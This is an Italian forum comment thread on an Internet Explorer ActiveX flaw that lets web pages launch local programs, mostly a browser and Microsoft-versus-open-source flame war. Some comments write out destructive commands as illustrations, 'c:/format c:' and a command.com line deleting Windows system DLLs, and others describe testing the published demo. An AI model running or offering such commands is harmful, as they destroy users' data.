          un conto è l'esecuzione di un programma e un
          altro è l'esecuzione di un comando

          se io faccio "c:prog.exe" e mi parte
          prog.exe non succede nulla almeno che esso
          non sia un virus ma in questo caso il virus
          dovrebbe gia essere caricato nel mio pc.

          se io invece faccio "del c:prog.exe" non
          succede nulla (il file non viene cancellato)
          quindi non si possono lanciare comandi si
          può solo far eseguire programmi il che
          dovrebbe essere anche voluto da parte della
          microsoftCerto, se metto online una paginetta che ti lancia un "c:/format c:" mi prometti che la vai a vedere?? ;)L'unico modo per mettersi il cuore in pace è disabilitare per sempre quell'aborto di ActiveX, finalmente una buona ragione per farlo una volta per tutte.CiaoTamerlano
  • Anonimo scrive:
    Mozilla forever
    Sul mio PC (Win98,IE6) l'exploit funziona :-(.Questa e' una vulnerabilita' grave.Ecco le patch:www.mozilla.orgwww.opera.com
    • Anonimo scrive:
      Re: Mozilla forever

      Ecco le patch:
      www.mozilla.org
      www.opera.comMeglio IE buggato con il rischio dello 0.000000000000000000000000001 per mille di avere problemi che non la navigazione con Mozilla o (mioddio) quel cesso di Opera.
      • Anonimo scrive:
        Re: Mozilla forever
        e perché?
      • Anonimo scrive:
        Re: Mozilla forever
        - Scritto da: fff

        Ecco le patch:

        www.mozilla.org

        www.opera.com

        Meglio IE buggato con il rischio dello
        0.000000000000000000000000001 per mille di
        avere problemi che non la navigazione con
        Mozilla o (mioddio) quel cesso di Opera.!!!WARNING.TROLL ATTACK!!!Ognuno usa il browser che vuole.Non mi sono mai piaciuti IE e Netscape(fino alla versione 6).Con Opera e Mozilla invece mi sono trovato benissimo.
      • Anonimo scrive:
        Re: Mozilla forever
        ti assicuro che la percentuale di rischio con IE è decisamente superiore...ma che hai contro Mozilla???io lo uso e funziona benissimo!!!
        • Anonimo scrive:
          Re: Mozilla forever
          - Scritto da: The Sanity Assassin
          ti assicuro che la percentuale di rischio
          con IE è decisamente superiore...
          ma che hai contro Mozilla???
          io lo uso e funziona benissimo!!!Non dategli retta o è un troll oppure è uno sf1ga70 che non riesce a scaricare ed installare Mozilla!Ora mi becco una X
      • Anonimo scrive:
        Re: Mozilla forever
        - Scritto da: fff
        Meglio IE buggato con il rischio dello
        0.000000000000000000000000001 per mille di
        avere problemi che non la navigazione con
        Mozilla o (mioddio) quel cesso di Opera.Ognuno la pensa come vuole.. io preferisco "perdermi" qualche flash pubblicitario trasparente con mozilla..ma evitare che il browser mi crashi al 95% delle volte dopo che chiudo l'ultima finestra (anche avendo messo tutti i SP e avendo aggiornato alla 6.qualcosa)evitare questi exploit stupidi..e soprattutto evitare come la peste outlook.. il mozilla mail funziona benissimo e ad ora non conosco nessun exploit.. magari perchè non funziona "COSI BENE" come iexplorer? con tutte le sue chicche.. activex.. embedded objects.. iframe..stranamente, i piu exploitati :)pensaci su..ciao
    • Anonimo scrive:
      Re: Mozilla forever
      - Scritto da: Nobody
      Ecco le patch:
      www.mozilla.org
      www.opera.comOh! Funzionano entrambe!
    • Anonimo scrive:
      Re: Mozilla forever
      - Scritto da: Nobody
      Sul mio PC (Win98,IE6) l'exploit funziona
      :-(.Questa e' una vulnerabilita' grave.

      Ecco le patch:
      www.mozilla.org
      www.opera.comIl primo e' un bug da 10 mega, il secondo un banner pubblicitario da 4. Browser proprio non ne vedo in quei link.
      • Anonimo scrive:
        Re: Mozilla forever
        - Scritto da: Ciao


        - Scritto da: Nobody

        Sul mio PC (Win98,IE6) l'exploit funziona

        :-(.Questa e' una vulnerabilita' grave.



        Ecco le patch:

        www.mozilla.org

        www.opera.com

        Il primo e' un bug da 10 mega,Dici ? Con la mia versione di Opera l'exploit pubblicato non funziona.
        il secondo un banner pubblicitario da 4.Basta pagare per non avere i banner. Costa meno di qualsiasi versione di Windows (Nella quale ti "regalano" IE) e su Linux ("regalato") funziona benissimo :-)
        Browser proprio non ne vedo in quei link. Datti una lustrata agli occhi, sei l'unico che non riesce a vederli.
      • Anonimo scrive:
        Re: Mozilla forever
        - Scritto da: Ciao

        Il primo e' un bug da 10 mega, il secondo un
        banner pubblicitario da 4. Browser proprio
        non ne vedo in quei link. Per "browser" si intende qualcosa che funzioni.Ah, già, ma tu sei convinto che Explorer sia un browser.... :-p
        • Anonimo scrive:
          Re: Mozilla forever

          Ah, già, ma tu sei convinto che Explorer sia
          un browser....

          :-pAnche più o meno l' 85% degli utenti mondiali:-))))
      • Anonimo scrive:
        Re: Mozilla forever
        - Scritto da: Ciao


        - Scritto da: Nobody

        Sul mio PC (Win98,IE6) l'exploit funziona

        :-(.Questa e' una vulnerabilita' grave.



        Ecco le patch:

        www.mozilla.org

        www.opera.com

        Il primo e' un bug da 10 mega, il secondo un
        banner pubblicitario da 4. Browser proprio
        non ne vedo in quei link. guarda meglio... apriti qualche tab e sii felice!
      • Anonimo scrive:
        Re: Mozilla forever

        Il primo e' un bug da 10 mega, il secondo un
        banner pubblicitario da 4. Browser proprio
        non ne vedo in quei link. il bug da 10 mega sotto linux va da Dio, non si impianta mai e per quanto l'ho provato anche sotto win è niente male.ma sai, il draghetto per i bug c'ha pure un applicativo bugzilla che li va a scovare e rintracciare per farli scomparire, a redmond, invece gli danno da mangiare ai bug, se no come farebbe a fare uscire na nuova release.opssssscordavooooooooooooooooooooma perchè ti ho risposto visto che TE 6 1 7R0LL?
        • Anonimo scrive:
          Re: Mozilla forever

          ma sai, il draghetto per i bug c'ha pure un
          applicativo bugzilla che li va a scovare e
          rintracciare per farli scomparire, a
          redmond, invece gli danno da mangiare ai
          bug, se no come farebbe a fare uscire na
          nuova release.E con 200000 versioni non sono ancora riusciti a levare il bug nei form di inserimento testo, si quello che c'e' anche in netscape 6.02. Al draghetto fareste bene a dargli da mangiare sul serio altrimenti poi tenta di mangiare il pinguino che gli fa chiudere la finestra senza avvisare l'utente.Opppps ma che ti rispondo a fare,tu fai parte del 3% che usa linux... quindi non esisti.
      • Anonimo scrive:
        Re: Mozilla forever
        O bella . . . . e nonostante il banner da 4Mb Opera viaggia piu' veloce di IE . . . . ah dimenticavo che che IE mentre navighi ti shera il disco in internet e gli utonti guardano cos'hai sul tuo PC
        • Anonimo scrive:
          Re: Mozilla forever
          si e ogni volta che accendi il pc attraverso il monitor tramite una reazione fisico-chimico-termo-nucleare bill gates vede quello che fai, e se non usi windows ti manda le truppe di sterminio dentro casa
    • Anonimo scrive:
      Re: Mozilla forever

      Sul mio PC (Win98,IE6) l'exploit funziona
      :-(.Questa e' una vulnerabilita' grave.Sul mio invece F-Secure becca subito il tentativo di eseguire del codice non autorizzato e lo blocca

      Ecco le patch:
      www.mozilla.org
      www.opera.comHo scaricato Mozilla un paio di settimane fa e ti assicuro che sul mio computer con NT (saro' io sfigato, booh) mi ha fatto perdere la pazienza da quanto spesso si impianta.Ciao
      • Anonimo scrive:
        Re: Mozilla forever
        NT che versione?
      • Anonimo scrive:
        Re: Mozilla forever

        Ho scaricato Mozilla un paio di settimane fa
        e ti assicuro che sul mio computer con NT
        (saro' io sfigato, booh) mi ha fatto perdere
        la pazienza da quanto spesso si impianta.Io uso Mozilla 1.0 su w98se e funziona molto benesenza polemica, ho abbandonato IE non per motividi religione ma con grande soddisfazione perche'mi trovo meglio con Mozilla.Non so se abbia problemi con NT ma non mi pareperche' l'ho installato anche su quell'OSed e' andato benissimo, pero' su NT l'ho usato poco. Consiglio a tutti di provare Mozilla, lomerita veramente.Saluti!P.S. fff, ciao e brillom o come si chiama, siete pietosamente troll
    • Anonimo scrive:
      Re: Mozilla forever
      Come ho scritto in un altro messagio.. ci sono centinaia di persone che qui criticano IE..ma alla fine, come si evince dalle statistiche di PI, più del 90% lo usa...Mi ricorda una storia di politica, ma (scusate il gioco di parole), questa è un'altra storia..
      • Anonimo scrive:
        Re: Mozilla forever
        no ma sai come funziona, tutti usano IE perchè non sarebbero capaci a usare mozilla (che in alcune cose è effettivamente meglio) o a scaricarlo, però siccome devono far vedere che loro sono esperti di pc, allora fanno le solite sparate contro ms, tanto noi non potremmo mai guardare sul loro pc, ma se ci guardi hanno solo Windows, IE e outlook, li usano, li criticano, però non cambiano perché non ne sono capaci, ma facendo così si sentono parte di qualcosa e riescono a calmare le loro frustazioni, bella gente no?
    • Anonimo scrive:
      Re: Mozilla forever
      sono pienamente d'accordo!! basta con sto ie che è pieno di buchi e che la gente tanto non aggiorna mai, nel mio sito web ho inserito un contatore, che fra le altre cose identifica i tipi di browser .. be il 95 % accede al sito con Internet explorer il bello è che di questa percentuale il 60 % adopera ancora le versione ie 5.0 o 5,5 certi adirittura la 4, ma vi rendete conto !! finche c'è gente del genere che servono a fare le patch?, tanto non lo aggiornano ugualmente, il problema secondo me è che un buona percentuale di gente che naviga in internet non sa quasi nulla dei rischi che corre e soprattutto è svogliata, queste persone si tengono quello che hanno pur di non rompersi tanto a fare aggiornamenti o meglio a passare a un'altro browser (vedi l'ottimo mozilla o Opera).
  • Anonimo scrive:
    non funziona
    sulla mia macchina l'exploit non funziona (win NT 4.0 sp6a IE6 tutte le patch applicate)
    • Anonimo scrive:
      Re: non funziona
      infatti nell'articolo c'è scritto che con tutte le patch applicate si dovrebbe essere al sicuro...
      • Anonimo scrive:
        Re: non funziona
        - Scritto da: The Sanity Assassin
        infatti nell'articolo c'è scritto che con
        tutte le patch applicate si dovrebbe essere
        al sicuro...E allora vorrei sapere dove sta la notizia... è una stronzata e basta. Allora tirate fuori un bug di IE3 e dite che se non si usa la 4+ ti possono formattare la piattina del maste...
  • Anonimo scrive:
    Che botta!
    E' disarmante scoprire che con 5 righe di codice si possono rubare un'infinità di informazioni sugli utenti!
    • Anonimo scrive:
      Re: Non è quello disarmante. ...
      E' disarmante sapere che chi scrive i SO e sa dei bug se ne frega ... sperando che nessuno se ne accorga ...Ciriciao Gente
    • Anonimo scrive:
      Re: Che botta!
      Ma che ca**o stai dicendo i cookie o i file li vedi e li apri solo in locale!!!Nessuno ti vede o ti copia nienteAl massimo potrebbe solo far partire qualche programma che tu hai gia nel pcGuarda qui!!http://www.pseirc.net/test.htmTi ho fregato tutti i file di c:
      • Anonimo scrive:
        Re: Che botta!

        Al massimo potrebbe solo far partire qualche
        programma che tu hai gia nel pcMa dico, siamo pazzi o cosa?A me non sembra tanto un "al massimo".Se faccio partire un bel "command.com /c del c:windowssystem*.dll" cosa pensi che succeda?/me che è sospettoso
  • Anonimo scrive:
    Come reagiscono open e closed
    Mondo open source:--------------------Trovato un bug lo si discute tra smanettoni, in modo da risolverlo. Si pubblica poi una patch, il più in fretta possibile, in modo da evitare che tale bug possa essere fonte di problemi per i propri "compagni" o "fratelli". A patch pubblicata si informa il resto della comunità e ci si vanta della celerità e della efficienza del mondo open. Sarà inoltre importante far notare quali enormi vantaggi porta la soluzione open, che risolve tutto subito e senza rischi per gli utenti (non utonti).Mondo closed source:--------------------Trovato un bug, ci si fionda su forum di discussione, newsgroup e quant'altro con il solo scopo di sputtanare la Microsoft (nemico numero uno). L'obiettivo è quello di essere citati come primi "scopritori" del nuovo bug (se possibile la citazione va fatta con nome, cognome, titoli e curriculum vitae). È importante che il bug venga diffuso rapidamente, nella speranza che qualcuno ne approfitti e sottolinei la debolezza della Microsoft nel settore assistenza, nonchè la pochezza mentale e la scarsa preparazione di chiunque sia in contatto (per lavoro o per passione) con i prodotti Microsoft.
    • Anonimo scrive:
      Re: Come reagiscono open e closed
      Quanto hai ragione... sottoscrivo in pieno, e aggiungo anche che - immagino per pure caso? - sul mio pc la vulnerabilita' descritta nell'articolo e mostrata in quei link non "funziona" affatto... XP, Explorer 6.0 e ovviamente controlli ActiveX abilitati.PS: basta anche solo guardare all'articolo di due giorni fa sui server Sun... tutti zitti & cheti tranne tre (3) persone di cui due anziche' commentare l'articolo han commentato - giustamente - l'assenza di commenti :)
      • Anonimo scrive:
        Re: Come reagiscono open e closed
        Sicuro che non funziona? Vai nel link per l'esecuzione dei programmi e inserisci questa stringa (se usi XP è diversa da quelle proposte):c:/windows/system32/calc.exeoc:/windows/system32/notepad.exeNon chiudere la pagina... attendi una decina di secondi... anche dopo che appare "executing file" e fammi sapere se non ti parte la calcolatrice.
        • Anonimo scrive:
          Re: Come reagiscono open e closed
          E' un hoax, un falso allarme...- Scritto da: andrea
          Sicuro che non funziona? Vai nel link per
          l'esecuzione dei programmi e inserisci
          questa stringa (se usi XP è diversa da
          quelle proposte):
          c:/windows/system32/calc.exe
          o
          c:/windows/system32/notepad.exe

          Non chiudere la pagina... attendi una decina
          di secondi... anche dopo che appare
          "executing file" e fammi sapere se non ti
          parte la calcolatrice.
          • Anonimo scrive:
            Re: Come reagiscono open e closed
            - Scritto da: blackdog

            E' un hoax, un falso allarme...A me funziona....Win 2000 Service Pack 2IExplorer 6 agg. Q321232
          • Anonimo scrive:
            Re: Come reagiscono open e closed
            Mica son scemo... se lo dico è perchè sul mio pc funziona!WinXP,Explorer6, quotidianamente aggiornato su windows update.
      • Anonimo scrive:
        Re: Come reagiscono open e closed
        Scusa la domanda ma che c'entra Sun ? Vuoi dire che nel sistema di sviluppo closed ci sono diversi comportamenti e che quello specifico descritto dal primo post è inerente solamente a MS ? Non ho capito bene... (sono un po' stanco...)Per quello che mi riguarda sono d'accordo sul fatto che sparare contro MS sia ormai l'assoluta normalità ma mi sembra improbabile che una generalizzazione closed - open possa essere veramente indicativa: se non sbaglio gli utenti di os closed sono all'incirca il 95% contro il tenero 5% degli utenti di os open. Credo sia poco più di una moda.Per quello che mi riguarda da fermo sostenitore del metodo di sviluppo open (nonchè utente) penso semplicemente che non usando quei software stanotte dormo tranquillo e stop, magari domani toccherà a me.Ciò non toglie che il codice di quelle applicazioni è in mano a MS quindi più di tanto lo scopritore del bug non poteva fare.Al di la delle battutacce degli utenti non è forse saggio informare tutti della sua esistenza onde evitare incidenti ? Non è *assolutamente* detto che il bug fosse sconosciuto prima della "trapelazione" quindi sfruttabile con conseguenze gravi. Senza parlare del fatto che potrebbe spronare MS a sbrigarsi nel rilascio di una patch.Mai capita questa cosa del nascondere il bug.Ciao !
      • Anonimo scrive:
        Re: Come reagiscono open e closed
        - Scritto da: cippa...
        PS: basta anche solo guardare all'articolo
        di due giorni fa sui server Sun... tutti
        zitti & cheti tranne tre (3) persone di cui
        due anziche' commentare l'articolo han
        commentato - giustamente - l'assenza di
        commenti :)E Sun dove la inserisci ? Open o closed ?
        • Anonimo scrive:
          Re: Come reagiscono open e closed
          la Sun gode, come lo dimostrano i commenti su questa rivista, di una maggiore simpatia da parte dei sostenitori dell'open-source che non la microsoft (non oso certo dire che e' immeritata, ci mancherebbe ;
          ).E' la Microsoft il bersaglio designato e costantemente preso di mira, non la Sun, indipendentementa dal fatto che anche la Sun sviluppi codice closed-source... il mio esempio dovrebbe essere piuttosto esplicito su questo punto, mi pare che il numero di commenti parli da solo :)ps: ti assicuro, andrea, che non funziona :)
    • Anonimo scrive:
      Re: Come reagiscono open e closed
      - Scritto da: Webmà
      Mondo closed source:
      --------------------...
      vitae). È importante che il bug venga
      diffuso rapidamente, nella speranza che
      qualcuno ne approfitti e sottolinei la
      debolezza della Microsoft nel settoreè una generalizzazione alquanto impropria, visto il caso in questione che è stato scoperto 2 settimane prima della rivelazione.
    • Anonimo scrive:
      Re: Come reagiscono open e closed
      Senti, ma tu che osanni il metodo close lo paghi il software che hai installato o te lo regalano?? Penso che non sia molto piacevole pagare decine di migliaia di Euro per avere software bacato ed essere in mano a MS, che invece di correggere a dovere il software esistente si preoccupa solo di sfornarne sempre di nuovo e costantemente bacato solo per rimpinguare le proprie tasche. Guarda le notizie di oggi su PI (Outlook, IE, SQL Server) non fanno altro che citare bachi. Incoraggiante no?
      • Anonimo scrive:
        Re: Come reagiscono open e closed

        buchi nella sicurezza... quale REALE ed
        EFFETTIVO problema rappresentano, per il
        99,999% delle aziende?Mai sentito parlare dei danni causati da wormcome NIMNDA e CODERED?
        Senti, tu pensi che Bill Gates si corichi la
        notte felice di aver "creato" dei bug?No, io penso che Bill Gates si corichi feliceper avere uno dei fatturati più alti del mondoe che questa campagna sulla sicurezza sia soloun modo per salvare la faccia e non perdereutenti, che per l'appunto portano altri soldi.
        Questo si chiama "anti-Microsoft" e non
        "anti-Windows". È pregiudizio, come quello
        che si legge quasi sempre qui dentro.Ti sei mai chiesto perchè la gente ce l'ha conMicrosoft. Ma hai solo idea di quante realtà haDISTRUTTO solo con il potere dei suoi soldi edel suo monopolio? Evidentemente no.Ti consiglio di approfondire... sul web ci sonoun sacco di articoli che ne svelano i retroscena.
        La sola differenza è che tu tramite internet
        lo scopri immediatamente (per il giochetto
        "cerchiamo di sputtanare la Microsoft /
        cerchiamo di gasare l'open source).Beh, direi proprio che M$ con tutti i soldi cheha potrebbe darsi una mossa a correggere i suoibug.
        problemi e difetti non risolti... che poi tu
        COMUNQUE sarai costretto ad accettare
        (perchè non lo sai)?Si, ma se hai i sorgenti (sotto GPL) ne hai ilcontrollo.
        Cosa credi, che al mondo esistano solo ditte
        perfette e che ci sia solo Bill Gates come
        unico nemico? È pregiudizio bello e buono.No, Bill Gates non è l'unico nemico, c'è ancheSteve Ballmer :-)Scherzi a parte, la M$ è sicuramente la relatàpiù pericolosa per la libertà futura degli utentipc.Ricordati solo una parola che la MicrosoftNON TI DARA` MAI!LIBERTA`
        • Anonimo scrive:
          Re: Come reagiscono open e closed
          ma per favore, mo la ms ci priva della libertà, certo come no, invece la patente euroa per il computer no, e gia, infondo adesso chiunque con un po' di soldi si compra quella patente (perché di quello si tratta, comprare) e diventa esperto automaticamente (senza sapere niente di niente), no questo non è un furto alla libertà non preoccupatevi, poi quando ci verrà proibito di usare internet o di usare il pc senza patente voglio vedere che fate, se starete ancora a fare le guerre anti-ms o ad opporvi a queste stupidaggini che ogni giorni vengono approvate
          • Anonimo scrive:
            Re: Come reagiscono open e closed

            ma per favore, mo la ms ci priva della
            libertà, certo come no, invece la patente
            euroa per il computer no, ...Wow, che rispostona!Tu neghi la mia affermazione citando qualcosa che secondo te è peggiore. Ciò NON nega affatto la mia affermazione.
          • Anonimo scrive:
            Re: Come reagiscono open e closed
            bravo continua a farti prendere per il culo da tutte le cavolate che vengono dette ogni giorno, tanto per te conta solo andare contro ms, continua così, poi però quando dovrai sborsare 3 milioni per usare un pc o collegarti a internet ne riparleremo
          • Anonimo scrive:
            Re: Come reagiscono open e closed
            Attenzione!!! Abbiamo un esempio di 'benaltrismo'.Ossia il rispondere alle domande dicendo che i problemi sono 'ben altri'. In questo modo ovviamente non si risolve alcun problema (ne quello piccolo, ne i problema 'benaltri') pero' e' una frase ad effetto.In sostanza si tratta di una variante raffinata della risposta: 'E' meglio la fica'.
        • Anonimo scrive:
          Re: Come reagiscono open e closed

          Ricordati solo una parola che la Microsoft
          NON TI DARA` MAI! LIBERTA`Hai visto troppi film. Windows l'ho SCELTO io, l'ho COMPRATO io perchè mi ANDAVA di farlo. Potevo scegliere altre cose, ma IO ho scelto. NON la Microsoft. Se poi hai le manie di persecuzione o altre paranoie, non riversarle su di me :)
          • Anonimo scrive:
            Re: Come reagiscono open e closed
            TU l'hai scelto.quanta gente non è in grado di farlo, e se lo trova preinstallato?
          • Anonimo scrive:
            Re: Come reagiscono open e closed

            TU l'hai scelto.
            quanta gente non è in grado di farlo, e se lo
            trova preinstallato?Se trovasse Linux preinstallato, avrebbe comunque altri problemi. Se l'utente finale non è una persona che "capisce" almeno in parte il mondo dei sistemi operativi (a prescindere da quali essi siano), si fermerà molto prima dei "buchi di sicurezza di IE".La massa ha già problemi se sposti l'icona di Excel dal descktop. Metterli su Linux, che è ancora da gente ghettizzata, è improponibile. Molto meglio subire qualche schermo blu (se si è ancora legati a Win95-98).
          • Anonimo scrive:
            Re: Come reagiscono open e closed
            - Scritto da: Torval

            TU l'hai scelto.

            quanta gente non è in grado di farlo, e se
            lo

            trova preinstallato?

            Se trovasse Linux preinstallato, avrebbe
            comunque altri problemi.senza dubbio. chi l'ha mai detto?
            Se l'utente finale
            non è una persona che "capisce" almeno in
            parte il mondo dei sistemi operativi (a
            prescindere da quali essi siano), si fermerà
            molto prima dei "buchi di sicurezza di IE".invece no, purtroppo... sai qual è il problema secondo me (che con gli utenti finali ho sempre a che fare)? che la gente non vuole una macchina semplice, la gente vuole una macchina potente e complessa, ma che sia facile da usare e si adatti con uno schiocco di dita a ciascuno di essi. e mi dispiace, ma non è possibile.
            La massa ha già problemi se sposti l'icona
            di Excel dal descktop. Metterli su Linux,
            che è ancora da gente ghettizzata, è
            improponibile. Molto meglio subire qualche
            schermo blu (se si è ancora legati a
            Win95-98).che linux sia per gente ghettizzata è forse legato alla sua scarsa diffusione, ma se è poco diffuso è perché molti, come te, lo considerano da gente ghettizzata. in altre parole, il cane che si morde la coda. ma visto e considerato che ormai ci sono GUI più che soddisfacenti, suite Office che poco hanno da invidiare a quelle più blasonate, installazioni idiot-proof, e che con un buon corso (tanto la gente ormai fa il corso pure per usare IE) si può imparare non dico ad amministrarlo, ma ad usarlo normalmente, perché continuare a preferire gli schermi blu, l'invasività di Explorer (qualcuno mi spieghi perché lo stesso programma deve fare da file manager, gestore del desktop, barra delle applicazioni e browser web, alla faccia del "keep it simple, stupid!") e i bachi le patch e contropatch, oltre al tacito supporto verso un monopolista che, quando viene messo alle strette minaccia molto sportivamente di ritirare Windows dal mercato?ciaogodz
      • Anonimo scrive:
        Re: Come reagiscono open e closed
        Viva berlusconi?
    • Anonimo scrive:
      Re: Come reagiscono open e closed
      http://bugzilla.mozilla.orgsegnala quello che vuoi, diventerai famoso anche tu
      • Anonimo scrive:
        Re: Come reagiscono open e closed
        http://bugzilla.mozilla.orgNo, perchè la mia etica da opensorciaro è diversa. A me interessano i bug di IE (che come PI ci insegna, uso a prescindere dal fatto che sia uno schifo).
    • Anonimo scrive:
      Re: Come reagiscono open e closed
      - Scritto da: Webmà...
      debolezza della Microsoft nel settore
      assistenza, nonchè la pochezza mentale e la
      scarsa preparazione di chiunque sia in
      contatto (per lavoro o per passione) con i
      prodotti Microsoft.Quale passione? Ma soprattutto, quale lavoro?
      • Anonimo scrive:
        Re: Come reagiscono open e closed

        Quale passione? Quella per l'informatica, che si associa all'utilizzo di un computer, che può usare diversi sistemi operativi tra cui Windows.
        Ma soprattutto, quale lavoro?Che domanda è, fammi capire a cosa vuoi arrivare, professore paladino della libertà.
        • Anonimo scrive:
          Re: Come reagiscono open e closed
          - Scritto da: sssss

          Quale passione?

          Quella per l'informatica, che si associa
          all'utilizzo di un computer, che può usare
          diversi sistemi operativi tra cui Windows.Bimbo, lavati la bocca col sapone, i sistemi operati sono un'altra cosa.



          Ma soprattutto, quale lavoro?

          Che domanda è, fammi capire a cosa vuoi
          arrivare, professore paladino della libertà.Tu ti gudagni da vivere (lavoro) usando software microsoft?
          • Anonimo scrive:
            Re: Come reagiscono open e closed

            Bimbo, lavati la bocca col sapone, i sistemi
            operati sono un'altra cosa.Ah si, certo. Tant'è che un PC formattato sul quale installi Windows NON funziona, perchè Windows NON è un sistema operativo. E' un programma. La bocca, amore, te la devi lavare tu. Al massimo mi puoi dire che a te Winny non va giù per motivi ben diversi da quelli "tecnici" (sei ancora allo stadio "schermo blu - luogo comune - cazzate da bar").
            Tu ti gudagni da vivere (lavoro) usando
            software microsoft?No, riciclo denaro sporco usando BeOS. Io dicevo in generale, cucciolone mio. Forse vivi in una caverna ma una marea di gente (esci dal tuo ghetto opensorciaro) vive (anche ben stipendiata) servendosi di prootti Microsoft (non solo, ma ANCHE). Poi se tu ci vuoi spiegare, da bravo professore di parte, che chi usa Microsoft deve per forza essere un coglione, allora -davvero- sei un alienato :) opensorciaro.
    • Anonimo scrive:
      Re: Come reagiscono open e closed
      :-)))mondo open source:------------------Chi scopre il bug avverte gli sviluppatori, che se il bug è grave e senza workaround non diffondono immediatamente la notizia, ma aspettano di avere una patch (1 o 2 giorni dopo). Se esiste un workaround, il bug viene diffuso anche subito e si spiega come aggirarlo. Su p.i. la notizia viene pubblicata quando la patch è già pronta. I windosari sfottono gli utenti di giocattolinux e l'opensource in genere. Gli utonti linux leggono la notizia e si scaricano la patch o la nuova versione di mozilla. e pensano:1- questo si che è software, mica quello di bill gates!2- non ho ancora trovato quella libreria che mi serve a compilare quel gioco...3- che palle questo unix, adesso riavvio in win98 e gioco con flight simulator.mondo closed source:--------------------Chi scopre il bug avverte il produttore, che lo invita a non renderlo pubblico finchè non è patchato. Dopo un po' (anche 1 giorno se sono bravi), arriva la patch, magari distribuita e installata dall'assistenza (se è il caso). mondo microsoft:----------------Chi scopre il bug avverte la microsoft, che fa finta di niente oppure dice "ok, lo patchamo in una settimana". Dopo 2 settimane il buco è ancora aperto. Il bug hunter non resiste e divulga la notizia. La ms si incavola e gli dice "irresponsabile!". Su p.i. i linuxari e i troll sfottono i sostenitori di msdos e il closed source in generale.Dopo un mese esce un fantastico "security update" o "hotfix" cumulativo che mette a posto questo e altri bug vecchi di un anno che per fortuna nessuno ha divulgato. L'utente windows se la scarica e pensa:1- quanto odio windows.2- vabbe, chi se ne frega...3- quanto odio linux. - Scritto da: Webmà
      Mondo open source:
      --------------------
      Trovato un bug lo si discute tra smanettoni,
      in modo da risolverlo. Si pubblica poi una
      patch, il più in fretta possibile, in modo
      da evitare che tale bug possa essere fonte
      di problemi per i propri "compagni" o
      "fratelli". A patch pubblicata si informa il
      resto della comunità e ci si vanta della
      celerità e della efficienza del mondo open.
      Sarà inoltre importante far notare quali
      enormi vantaggi porta la soluzione open, che
      risolve tutto subito e senza rischi per gli
      utenti (non utonti).


      Mondo closed source:
      --------------------
      Trovato un bug, ci si fionda su forum di
      discussione, newsgroup e quant'altro con il
      solo scopo di sputtanare la Microsoft
      (nemico numero uno). L'obiettivo è quello di
      essere citati come primi "scopritori" del
      nuovo bug (se possibile la citazione va
      fatta con nome, cognome, titoli e curriculum
      vitae). È importante che il bug venga
      diffuso rapidamente, nella speranza che
      qualcuno ne approfitti e sottolinei la
      debolezza della Microsoft nel settore
      assistenza, nonchè la pochezza mentale e la
      scarsa preparazione di chiunque sia in
      contatto (per lavoro o per passione) con i
      prodotti Microsoft.
  • Anonimo scrive:
    caro draghetto
    che bello sapere che ci sei tu ad accompagnarmi in rete, tu con il tuo rispetto degli standard, la tua velocità di rendering, ma soprattutto con la tua attenzione per la pulizia a non lasciare in giro sporco qua e la come password, cookie e quant'altro mi capita di avere sul mio linux.grazie mozillone di esistere, sto cominciando a volerti un gran bene :)
  • Anonimo scrive:
    Apache
    in 24 ore hanno risoltoin 2 settimane nulla !!!il tempo e' tirannoforse il bug e creato apposta ?la 5 e' immune :-)
  • Anonimo scrive:
    che bello non usare Explorer e Windows
    uso Chimera su di un Mac ed un Athlon con Mozzilla e FreeBSD......e sono felice :o)
  • Anonimo scrive:
    Micro soft, mega bugs
Chiudi i commenti